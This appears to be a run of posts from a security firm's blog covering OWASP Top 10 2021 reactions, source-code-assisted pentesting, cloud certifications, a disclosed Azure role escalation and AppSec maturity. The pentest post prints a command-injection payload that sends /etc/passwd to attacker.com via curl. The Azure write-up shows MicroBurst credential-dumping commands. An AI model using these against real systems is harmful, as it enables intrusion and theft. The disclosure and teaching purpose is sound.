Back

AppSec Experts React to the OWASP Top 10 2021

The Open Web Application Security Project (OWASP) celebrated its 20th anniversary on Friday, September 24. On the same day, it released updates to the OWASP Top 10 – for the first time since 2017. Big steps toward application security maturity

I attended OWASP Executive Director Andrew van der Stock’s warmup presentation where he spoke about the updates. He mentioned that many of the changes stem from improvements in the methodology brought in by a new OWASP co-lead, Brian Glas. Notably, this version of the OWASP Top 10 is “more data-driven than ever.”  

It sourced its data from pentesting vendors, bug bounty vendors, and organizations that contribute internal testing data. This year, the authors gathered data from the testing of over 500,000 applications. There are also two risks on the list that were sourced from a community survey of front-line application security and development experts. You can read more about the OWASP Top 10 methodology online here and below is an overview of the changes, 2017 versus 2021.

Overview of the OWASP Top 10 changes, 2017 versus 2021.

Speaking of front-line application security and development experts, I wanted to dig a little deeper into the OWASP Top 10 2021 and hear from folks who are influenced by the update. So, I reached out to a few of my NetSPI colleagues who specialize in application security and application penetration testing – Managing Director Nabil Hannan and Practice Director Antti Rantasaari – well as a bench of noteworthy AppSec experts – Diana Kelley (Security Curve), Jeff Williams (Contrast Security), and Peter Lukas (Code42) – to get their take on the most critical changes and how it will impact the security community. 

TL;DR – 5 key themes observed across the responses 

  1. A04: Insecure Design receives a warm welcome. 
  2. Broken Access Control moving to the top of the list is timely, and an indicator of a shift in AppSec strategy.
  3. Cloud adoption is driving the prevalence of Server-Side Request Forgery (SSRF).
  4. A strong focus on security within the SDLC; Approaching security challenges at the root.
  5. The list moves past specific individual vulnerabilities and focuses on categories of risk. 

What surprises or interests you most about the OWASP Top 10 2021? 

I’ll start! For me, the fall of Injection was the most surprising change. Injection has been the highest-ranked risk since 2007. The 2021 version of the Top 10 sees Injection fall to third place, even with XSS (which was A02 in 2010) getting rolled into it. While there are several factors related to this change, the efficacy of the OWASP Top 10 as an awareness-raising tool, and the growing use of secure-by-default frameworks which implement protections against many forms of injection are most prominent.  

Here’s what our expert panel found most shocking or interesting about the updated Top 10: 

Peter Lukas, Security Architect, Code42:  

The updates to the OWASP Top 10 are out, and there are some noteworthy conclusions that can be drawn from them. Most interestingly, Broken Authentication has fallen from position A02 to position A07, while Broken Access Control has surged to the very top of the list! This tells me that we’re getting better at locking the front door, and we really need to shift our focus on where users are entitled to go once inside our application environment.” 

Antti Rantasaari, Practice Director, NetSPI 

The OWASP Top 10 2021 moves a bit further from vulnerabilities and more towards design and the SDLC. The Top 10 list has been more vulnerability-focused in the past, and now we are seeing very broad categories, like Insecure Design. Broken Access Control moving to A01 makes a lot of sense – that is the most common high-severity vulnerability that we identify during our penetration testing.” 

Diana Kelley, CTO and Founding Partner, Security Curve:  

“Not exactly surprised, but it was really interesting and timely to see Broken Access Control move to the top of the list. I am a little disappointed to see Cryptographic Failures up at number two because we have a lot of great tools – many that are built into the most commonly used development frameworks – to help us implement crypto and crypto key management securely.” 

Nabil Hannan, Managing Director, NetSPI:  

The most surprising change – in a good way – is the fact that the list now includes Insecure Design. Having worked in the AppSec space for the last 15 years, from empirical data I’ve seen that the split between design flaws and security bugs is 50/50. The challenge with design flaws is that it usually requires a human to identify the vulnerability, usually through some type of secure design review or threat modeling activity that focuses on breaking the software. This indicates that organizations are going beyond just identifying security bugs and are starting to look for design-level flaws more proactively. 

Additionally, it is important to note that organizations need to maintain a living list of the most common types of vulnerabilities that they want to eliminate in their organization’s software. Usually, this needs to be a list of top 3-4 vulnerabilities to ensure there’s a proper focus on the vulnerabilities. Usually, this can be done with real data from various types of security assessments that are being performed to identify and fix vulnerabilities. These types of lists should be used to drive change, simply publishing a list won’t drive change, but using the list to fix –or if possible, eradicate – certain vulnerabilities is necessary.” 

Jeff Williams, Co-Founder and CTO, Contrast Security:  

I was most glad to see that the scope of the Top 10 has expanded to include the entire software supply chain and the entire software lifecycle. In particular, I welcome the new Insecure Design item which will encourage practices like threat modeling and security architecture. I also think it’s great that, in the wake of the SolarWinds and Kasaya breaches, the team included the Software Integrity category. This will help to ensure that the software we create is actually the software that gets delivered into production and doesn’t contain malware. 

The data science behind the OWASP Top 10 is phenomenal. Data from over 500 thousand real-world applications and APIs. I really wish they had included data about real-world attacks as this would have greatly expanded our understanding about which of these vulnerabilities are being attacked, how prevalent are the attacks, and which attacks actually reach their targeted vulnerability.” 

There are three new vulnerabilities on the list: Server-Side Request Forgery (SSRF), Software and Data Integrity Failures, and Insecure Design. Why do you think these vulnerabilities have become more prevalent? 

It is important to note that these three new categories are the result of an important change in the data gathering methodology. In previous versions of the OWASP Top 10, data contributors were asked to report statistics on defect discovery findings that mapped to 70 specific CWEs (weakness categories, as defined by MITRE’s Common Weakness Enumeration project). Data for any findings that did not map to those CWEs were not previously gathered. This resulted in a huge selection bias. How huge? For the first time, the 2021 Top 10 instead asked data contributors to submit statistics for all CWEs, resulting in responses with findings data for almost 700 CWEs! Considering this 90% increase in CWEs evaluated, it’s not surprising to see the emergence of these three new categories: SSRF, Software and Data Integrity Failures, and Insecure Design. 

More thoughts on the three new categories from our AppSec experts:  

Diana Kelley, CTO and Founding Partner, Security Curve:  

“I am absolutely thrilled that Insecure Design was added as a new category. Past Top 10s have focused on the technical implementation, which occurs after the design phase. However, a lot of mistakes are introduced through a problematic design… as you might imagine from it being reflected in this list, this happens a lot. The earlier a problem can be identified and addressed, the better. Better, more security-aware design processes should result in stronger, more resilient software.  

I’m also very happy to see Software and Data Integrity because, as described by OWASP, this is getting into the area of software supply chain assurance. As we saw with SolarWinds, even patches and updates can be an infection vector. Highlighting the importance of checking code updates before applying them is welcome and should contribute to overall software security at organizations.  

SSRF is an interesting addition. This has always been an issue to watch for, but one of the reasons it might be becoming more prevalent now is the ubiquity of application designs built around REST – service-based architecture and microservices, particularly those delivered via the cloud. As REST becomes a more prevalent mode of application design and delivery, the more we would expect misconfigured services to add to this problem. The fact that we’re seeing it on the list reflects the reality of how modern applications are built, so I’m glad to see it there.” 

Peter Lukas, Security Architect, Code42:  

“The inclusion of Insecure Design (A04:2021), Software and Data Integrity Failures (A07:2021) and Server-Side Request Forgery (A09:2021) reflect trends we’ve been observing in our own penetration testing and bug bounty programs. The prevalence of containerized services, reverse-proxies, and other cloned-from-the-repo microservices are making it easy for our developers to get code out the door while giving attackers the opportunity to inconspicuously take advantage of the trust we’ve placed in common automation and orchestration components. Today, our developers are not only tasked with securing the application but, thanks to those components, the application environment as well. I can see this added responsibility reflected in these updates for 2021.” 

Antti Rantasaari, Practice Director, NetSPI 

“Like OWASP states, the Top 10 list is intended to bring awareness to application security risks, and two of the new categories, Software and Data Integrity Failures and Insecure Design, are certainly important for secure software development. These issues may not be more prevalent than before; rather, their addition reflects OWASP’s move away from top 10 vulnerabilities to the top 10 application security categories.

SSRF is the only individually listed vulnerability while the other items on the Top 10 list are broad categories. Access to REST APIs and cloud provider metadata services via SSRF, most commonly restricted to GET requests, have increased the impact and raised the profile of the attack.”  

Jeff Williams, Co-Founder and CTO, Contrast Security:  

“SSRF is a great addition. Even though the backward-looking data science doesn’t support it, I think it’s smart to include a few forward-looking items in the list. This is a practice I started when I ran the OWASP Top 10 project many years ago. SSRF in particular is a serious problem for modern API-driven applications and is clearly where the puck is going. Both Software Integrity and Insecure Design are interesting items that dramatically expand the scope of the OWASP Top 10. I think it’s great that the team is moving past specific individual vulnerabilities and focusing on whole categories of problem, as well as expanding to covering parts of the software development lifecycle that are the root cause of problems.” 

Nabil Hannan, Managing Director, NetSPI:  

“The three new vulnerabilities in the list are indicative of how the industry is shifting its focus on security from being a check-the-box activity to proactively identifying and fixing vulnerabilities. Regarding SSRF with more and more organizations migrating to the cloud and adopting an API based design paradigm, SSRF is becoming more prevalent. Regarding Data Integrity Failures and Insecure Design, there is more focus these days on making sure software systems are being designed properly and whether the design is secure or not – which is a step in the right direction to proactively building secure software.” 

Final Thoughts on the OWASP Top 10 2021 

The 2017 OWASP Top 10 had data from 50,000 assessments of web applications. This year’s version has ten times that amount. In addition, this year the data-gathering process required contributors to differentiate between initial test data and retest data. Previous versions of the Top 10 treated initial-test and retest data identically, which is problematic for defect discovery methods that let developers quickly and inexpensively rescan their code. Such behavior can cause ballooning of defects easily discovered through certain automated methods. I’m glad to see this problem solved in this year’s methodology. 

Injection findings moving down on the list is a testament to the effectiveness of the OWASP Top 10. Collaborating to create awareness for the most common web application security risks is critical. Along those same lines, for years people have been incorporating the OWASP Top 10 into their standards, for instance, PCI. OWASP had been averse to this, considering it is a volunteer organization. However, they’ve had a change of heart and the 2021 release includes guidance on how to use it as a standard and how to begin to develop an application security program with it.  

However you choose to leverage the OWASP Top 10, it’s evident that – queue Bob Dylan – the times they are a-changin’. I applaud the OWASP authors and contributors for making the necessary updates to the list and its methodology. It’s a significant step towards improving the maturity of the world’s application security programs and practices.  

NetSPI’s web application pentesting services target the OWASP Top 10. Connect with our AppSec experts to get started!
Back

Why You Should Consider a Source Code Assisted Penetration Test

In almost every industry, client-provider relationships look for win-win scenarios. For some, a win-win is as simple as a provider getting paid and the client getting value out of the money they paid for the service or product. While delivering high-quality services is certainly a big win, there are many opportunities in the pentesting space to win even bigger from the perspective of both the client and the provider. Enter: source code assisted penetration testing.

Here’s the TL;DR of this article in a quick bullet list:

5 reasons why you should consider doing a source code assisted pentest?

  • More thorough results
  • More comprehensive testing
  • More vulnerabilities discovered
  • No added cost 
  • Much more specific remediation guidance for identified vulnerabilities 

Not convinced? Let’s take a deeper dive into why you should choose a source code assisted pentest over a black-box or grey-box pentest.

Cost

We should probably get this out of the way first. To make a long story short, there’s no extra cost to do source code assisted penetration testing with NetSPI. This is a huge win, but it is by no means the only benefit of a source code assisted pentest. We’ll discuss the benefits in greater detail below.

Black-box vs. grey-box vs. white-box penetration testing 

Penetration testing is typically performed from a grey-box or black-box perspective. Let’s define some of these terms:

Black-box: This means that the assessment is performed from the perspective of a typical attacker on the internet. No special access, documentation, source code, or inside knowledge is provided to the pentester in this type of engagement. This type of assessment emulates a real-world attacker scenario.

Grey-box: This means that the assessment is performed with limited knowledge of the inner workings of the application (usually given to the tester through a demo of the application). Access is typically granted to the testers by providing non-public access to the application in the form of user or admin accounts for use in the testing process. Grey-box is the typical perspective of most traditional pentests.

White-box: This is where source code assisted pentests live. This type of assessment includes everything that a grey-box one would have but adds onto it by providing access to the application’s source code. This type of engagement is far more collaborative. The pentester often works with the application architects and developers to gain a better understanding of the application’s inner workings.

Many come into a pentest with the desire to have a black-box pentest performed on their application. This seems very reasonable when you put yourself in their shoes, because what they’re concerned about is ultimately the real-world attacker scenario. They don’t expect an attacker to have access to administrative accounts, or even customer accounts. They also don’t expect an attacker to have access to their internal application documentation, and certainly not to the source code. These are all very reasonable assumptions, but let’s discuss why these assumptions are misleading.

Never assume your user or admin accounts are inaccessible to an attacker

If you want an in-depth discussion on how attackers gain authenticated access to an application, go read this article on our technical blog, Login Portal Security 101. In summary, an attacker will almost always be able to get authenticated access into your application as a normal user. At the very least, they can usually go the legitimate route of becoming a customer to get an account created, but typically this isn’t even necessary.

Once the authentication boundary has been passed, authorization bypasses and privilege escalation vulnerabilities are exceedingly common findings even in the most modern of applications. Here’s one (of many) example on how an attacker can go from normal user to site admin: Insecurity Through Obscurity.

Never assume that your source code is inaccessible to an attacker

We’ve encouraged clients to choose source code assisted pentesting for some time now, but there are many reasons why organizations are hesitant to give out access to their source code. Most of these concerns are for the safety and privacy of their codebase, which contains highly valuable intellectual property. These are valid concerns, and it’s understandable to wait until you’ve established a relationship of trust before handing over your crown jewels. In fact, I recommend this approach if you’re dealing with a company whose reputation and integrity you cannot verify. However, let me demonstrate why source code assisted pentests are so valuable by telling you about one of our recent pentests: 

Customer A did not provide source code for an assessment we performed. During the engagement, we identified a page that allowed file uploads. We spent some time testing how well they had protected against uploading potentially harmful files, such as .aspx, .php, .html, etc. This endpoint appeared to have a decent whitelist of allowed files and wouldn’t accept any malicious file uploads that we attempted. The endpoint did allow us to specify certain directories where files could be stored (instead of the default locations) but was preventing uploads to many other locations. Without access to the source code handling these file uploads, we spent several hours working through different tests to see what we could upload, and to where. We were suspicious that there was a more significant vulnerability within this endpoint, but eventually moved on to testing other aspects of the application given the time constraints of a pentest.

A few days later, we discovered another vulnerability that allowed us to download arbitrary files from the server. Due to another directory traversal issue, we were finally able to exfiltrate the source code that handled the file upload we had been testing previously. With access to the source, we quickly saw that they had an exception to their restricted files list when uploading files to a particular directory. Using this “inside knowledge” we were able to upload a webshell to the server and gain full access to the web server. This webshell access allowed us to… you guessed it… view all their source code stored on the web server. We immediately reported the issue to the client and asked whether we could access the rest of the source code stored on the server. The client agreed, and we discovered several more vulnerabilities within the source that could have been missed if we had continued in our initial grey-box approach.

Attackers are not bound by time limits, but pentesters are

The nature of pentesting requires that we only spend a predetermined amount of time pentesting a particular application. The story above illustrates how much valuable time is lost when pentesters have to guess what is happening on the server-side. Prior to having the source code, we spent several hours going through trial and error in an attempt to exploit a likely vulnerability. Even after all that time, we didn’t discover any particularly risky exploit and could have passed this over as something that ultimately wasn’t vulnerable. However, with a 5-minute look at the code, we immediately understood what the vulnerability was, and how to exploit it. 

The time savings alone is a huge win for both parties. Saving several hours of guesswork during an assessment that lasts only 40 hours is extremely significant. You might be saying, “but if you couldn’t find it, that means it’s unlikely someone else would find it… right?” True, but “unlikely” does not mean “impossible.” Would you rather leave a vulnerability in an application when it could be removed? 

Let’s illustrate this point with an example of a successful source code assisted penetration test:During a source code assistedpentest, we discovered an endpoint that did not show up in our scans, spiders, or browsing of the application. By looking through the source code, we discovered that the endpoint could still be accessed if explicitly browsed to and determined the structure of the request accepted by this “hidden” endpoint. 

Example of a successful SCA penetration test

The controller took a “start_date” and “end_date” from the URL and then passed those variables into another function that used them in a very unsafe manner:

The controller took a “start_date” and “end_date” from the URL and then passed those variables into another function that used them in a very unsafe manner

This php file used the unfiltered, unmodified, un-sanitized parameters directly in a string that was used in a “shell_exec()” function call. This function is executed at the system level and resulted in command injection on the server. As a proof of concept, we made the following request to the server and were able to exfiltrate the contents of /etc/passwd to an external server: https://redacted.com/redacted/vulnpath?start_date=2017-07-16|echo%20%22cmd=cat%20/etc/passwd%22%20|%20curl%20-d%20@-%20https%3a%2f%2fattacker.com%2flog%20%26

In layman’s terms: An attacker is essentially able to run any code they want on the server with this vulnerability, which could lead to full host or even network compromise. 

With a vulnerability this significant, you should be wondering why this endpoint never showed up in any of our black-box or grey-box pentesting. Well, the answer is that this particular endpoint was supposed to only be used by a subset of the client’s customers. The testing accounts we were given did not include the flag to show this endpoint. Had this been a pentest without access to source code this would almost certainly have been missed, and the command injection vulnerability would still be sitting in the open customer accounts that could see this endpoint. After fixing this vulnerability, the client confirmed that no one had already exploited it and breathed a huge sigh of relief.

On the other hand, the client in our first example had a far different outcome. Even though the company immediately fixed the vulnerability in the latest version of the product, they failed to patch previously deployed instances and those instances were hacked months later. A key portion of the hacker’s exploit chain was the file upload vulnerability we had identified using the source code. 

Had we not discovered the vulnerability and disclosed it to them, the hack would have been much worse. Perhaps the attackers used the same methodology we did to exploit the vulnerability, but it’s just as likely that they used another method of discovering a working exploit against that file upload. This is a perfect example of why source code assisted pentests should be your go-to solution when performing a pentest. We discovered the vulnerability months ahead of them getting hacked because we had access to the source code. If they had properly mitigated the vulnerability, they could have potentially avoided an exceptionally costly hack.

Specific Remediation Guidance

To close out this post, I want to highlight how much more specific the remediation guidance can be when we’re performing a source code assisted pentest as opposed to one without source code. Here’s an example of the remediation guidance given to a client with the vulnerable php script:

Employ the use of escapeshellarg() in order to prevent shell arguments from being included into the argument string. Specifically, change line 47 to this:

$output = shell_exec(escapeshellarg($scriptOgcJs));

Additionally, the startDate and endDate parameters should be validated as real dates on line 26 of the examplecontroller.php page. It is recommended that you implement the php checkdate function as a whitelist measure to prevent anything other than a well-formatted date from being used in sensitive functions. Reference: https://www.php.net/manual/en/function.checkdate.php

Without access to the source code, we are only able to give generic guidance for remediation steps. With the source code, we can recommend specific fixes that should help your developers more successfully remediate the identified vulnerabilities.

Get Started on a Secure Code Assisted Pentest with NetSPI
Back

CSO: 8 top cloud security certifications

NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:

As companies move more and more of their infrastructure to the cloud, they’re forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.

It’s no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.

But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.

Going beyond certifications

All of these certs are good ways to demonstrate your skills to your current or potential future employers — they’re “a good way to get your foot in the door at a company doing cloud security and they’re good for getting past a resume filter,” says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren’t a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.

“Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform,” Fosaaen continues. “Many of the currently available certifications only require people to memorize terminology, so you don’t have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you’re going the extra level to make sure the candidates really do understand the cloud providers that your organization uses.”

Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute’s Cloud Penetration Testing course, BHIS’s Breaching The Cloud Perimeter, or his own company’s Dark Side Ops Training. Concrete training courses like these can be a great complement to the “book learning” of a certification.

To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html

Back

Escalating Azure Privileges with the Log Analytics Contributor Role

TL;DR – This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based off the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AZPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID – d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.

Looking for an Azure pentesting partner? Consider NetSPI.

Back

A Checklist for Application Security Program Maturity

Building an application security (AppSec) program that stays current is no easy feat. Add to that the ubiquity of software and applications in everything from consumer goods to medical devices to submarines.There is an increasingly urgent need for organizations to take another look at their AppSec strategies to ensure they are not left vulnerable to cyberattacks and continuously measure and improve their program maturity.

Heads up: Building a world-class, mature AppSec security program is something that needs to be accomplished in phases. It will not happen overnight. A great deal of foundational work needs to be in place before an organization can achieve positive results. 

When analyzing AppSec programs, we often find a number of sizable gaps in how vulnerabilities are managed as well as opportunities for improvement, especially related to security processes around the software development lifecycle (SDLC). Addressing these issues and harmonizing the various security processes will help give organizations the capability and vision to identify, track, and remediate vulnerabilities more efficiently, eventually elevating the organization to the level of maturity it seeks.

Following is a checklist to help organizations think through the issues around AppSec maturity to build a program that produces valuable security results.

  Ensure Your Security Practices are Current

Given how rapidly application development techniques and methodologies are transforming – and the rate at which software is developed today – companies need to ensure that their security practices are staying current with the ever-changing pressures around compliance/governance, software deployment, DevOps, SDLC, and training. Understanding the current level of maturity and developing a data-driven plan to evolve your AppSec program is key to the success of an organization’s security efforts.

  Leverage Real World Data to Benchmark Your AppSec Program

Put a stake in the ground and objectively determine the status of your AppSec program. Comparing your organization’s program with real world data across multiple business verticals will help augment your efforts and determine areas that require focus. Base your security decision on your specific business needs andlessons learned from other mature programs in your industry.

  Put Roadmaps in Place to Prioritize and Allocate Resources

The AppSec and software engineering teams within an organization should constantly partner to evolve and improve the AppSec posture for all software assets. This collaboration will help determine how to improve upon current efforts while uncovering additional activities that should be adopted to meet business goals. Putting in place a formalized roadmap for this collaboration allows an organization to better prioritize its business initiatives, budgets, and resource allocation while reducing the overall AppSec risk faced by the organization.

Roadmap stipulation: Use caution and watch for bias. Organizations that are serious about developing a mature program need to be mindful that there may be inherent team biases based on familiarity. For example, if the AppSec team comes from a penetration testing background, the program may lean toward a pentesting bias. Is the team’s experience in code review? Then that bias may shine through. While both disciplines are important and should be a part of an AppSec program, my point is that there may be bias when a more objective approach is needed. 

Also understand that there are many frameworks to mature application security. A one-size-fits-all approach is not going to work because every organization has unique needs and objectives around thresholds, risk appetite, and budget availability. 

  Insist on Governance in the SDLC

Setting up governance within the SDLC is critical. Why? If security teams don’t define what they are trying to accomplish or what security looks like within the SDLC process, it leaves too much ambiguity for who is accountable. Creating governance around SDLC will also help define where an organization needs to build in testing, both manual and automated, from a vulnerability discovery perspective.

  Track Your Progress; Benchmark Your Efforts Against Your Peers

Benchmarking your AppSec program by leveraging industry standard frameworks allows you to measure AppSec program maturity consistently and objectively, and make informed decisions based on your business objectives.

Benchmarking scorecards, supported with visuals, enable high-bandwidth conversations with your organization’s leadership team and provides an opportunity to showcase the positive influence that your AppSec program is having on the organization’s business goals. Additionally, you can leverage data from your benchmarking efforts to compare your efforts to others within your peer vertical group, and other business verticals that are also leveraging the same industry standard AppSec framework. 

  Employ Risk-Based Application Penetration Testing

When looking to mature an AppSec program, organizations should view application penetration testing as a gate validating that everything implemented in the SDLC is working, not just a discovery of vulnerabilities. Pentesting services should be the method used to determine the effectiveness of your secure SDLC and all the automated and manual processes implemented. Oftentimes, organizations will approach this concept in the reverse by starting with penetration testing

Additionally, having a dynamic pentesting platform that offers data points and risk scores aids in objectively identifying where AppSec is immature and what needs to be prioritized to remediate vulnerabilities that present the greatest risk.  

  Determine When to Use Automation in Vulnerability Discovery

To build an optimum, mature AppSec program, it is important to determine when it is best to use automation in vulnerability discovery and when to employ manual penetration testing. In short, an effective AppSec program includes the ability to manage and employ threat modelingmanual penetration testing, and secure code review, augmented with automated vulnerability discovery tools that are deployed at various phases of the SDLC process. 

For example, automatic testing like dynamic scanning, static analysis, and interactive security testing may be sufficient day to day, but manual penetration testing is warranted when significant architectural changes or technology upgrades to software systems are made. Finding balance in vulnerability discovery is important. It isn’t an either/or.

Vulnerabilities found in production cost roughly $7,600 to fix – 9,500% more than the $80 it would cost to fix those same vulnerabilities when they are detected early in the development process.

– WhiteSource reporting on a joint study by IBM and Ponemon Institute

  Insist on Metrics for Proper Data and Analysis

Consistent, timely, and accurate DevSecOps data measurements are important feedback for any organization to capture and analyze as it looks to govern development operations. Quality metrics (numbers with analysis and meaning in context) can ensure visibility, accountability, and management of software security initiatives. Proper application security program metrics allow you to articulate the AppSec program’s value to your organization’s leadership. The benefit? Being able to properly evangelize the value of your AppSec effortsmakes it easier to procure funding and improve the security risk posture of your organization. Additionally, understanding the data at hand to be able to answer contextualized business questions allow for better strategic decision making.

  Maturity Attained: Be an Ambassador

What does an organization do once it determines its AppSec program is mature? First, decide if a mature program is a long-term goal. Obviously, security always needs to be a priority, but ongoing maturity programming can be expensive and time consuming. Secondly, there will undoubtedly always be areas that require more attention. While addressing them, I encourage organizations to share their program successes with the broader market. Become a leader and use AppSec maturity as a differentiator that can drive customer and team member goodwill, brand differentiation, and market leadership.

Back

Apiiro and NetSPI Partner to Provide Contextual, Risk-Based Penetration Testing

Tel Aviv and Minneapolis, Minnesota  –  Apiiro, the industry’s first Code Risk Platform™, and NetSPI, the leader in penetration testing and attack surface management, today announced a strategic partnership to combine Apiiro’s comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). The partnership enables contextual and risk-based application security testing for its mutual customers.

Organizations rely on penetration testing for releasing and maintaining secure applications. As a result of the partnership, NetSPI customers will be able to test their applications, networks, and cloud infrastructure at scale and manage their attack surfaces using risk visibility and context provided by Apiiro. NetSPI’s PTaaS will be supported by Apiiro’s comprehensive view of security and compliance risks and keen understanding of how to manage the complexities of a risk-based Secure Software Development Lifecycle (SSDLC).

